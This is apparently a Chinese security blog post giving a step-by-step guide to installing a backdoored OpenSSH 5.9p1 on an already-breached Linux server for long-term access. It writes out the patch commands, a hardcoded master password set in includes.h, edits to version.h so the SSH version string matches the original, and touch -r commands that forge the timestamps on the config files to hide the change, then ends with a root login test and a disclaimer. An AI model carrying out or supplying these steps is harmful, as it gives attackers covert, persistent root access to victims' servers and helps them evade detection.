0x00 前言
虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了,本次就是通过WinSCP与Linux服务器进行连接,然后配置安装SSH后门,这次实验主要目的通过实践学习熟悉Linux SSH后门的安装过程和步骤。
0x01 配置SSH后门
2.1:建立连接
利用winSCP工具(也可以选用其他工具)连接已知(即已经渗透成功的服务器)服务器,如图:
连接成功后:
用SecureCRT连接成功后如图:
通过ssh -V查看当前SSH版本
上传带有后门的SSH安装包
上传工具(上面提到的WinSCP、SecureCRT、putty都可以,自行选择)
解压上传的安装包
tar zxf openssh-5.9p1.tar.gztar zxf 0x06-openssh-5.9p1.patch.tar.gz
执行如下命令,移动原有配置文件
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.oldmv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
复制文件sshbd5.9p1.diff到openssh-5.9p1目录
cd openssh-5.9p1.patch/cp sshbd5.9p1.diff …/openssh-5.9p1cd …/openssh-5.9p1patch < sshbd5.9p1.diff
编辑includes.h文件,设置自己的后门密码
vi includes.h找到#define SECRETPW “apaajaboleh” // apaajaboleh为后门的密码 可修改成自己设定的密码,如图
修改当前系统的SSH版本
通过ssh -V查看当前SSH版本,记录下来
vi version.h 修改version.h文件的版本信息
0x02 安装SSH后门
执行./configure --prefix=/usr --sysconfdir=/etc/ssh指定配置选项
执行make && make install 编译安装
安转完成后如图:
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config //修改日期touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config //修改日期/etc/init.d/ssh restart //重启ssh服务
0x03 测试后门是否安装成功
用连接工具连接ssh,用户名为root,密码为前面设置的SSH后门的密码
最后
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的
本文始发于微信公众号(无害实验室sec):权限维持之SSH后门安装
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论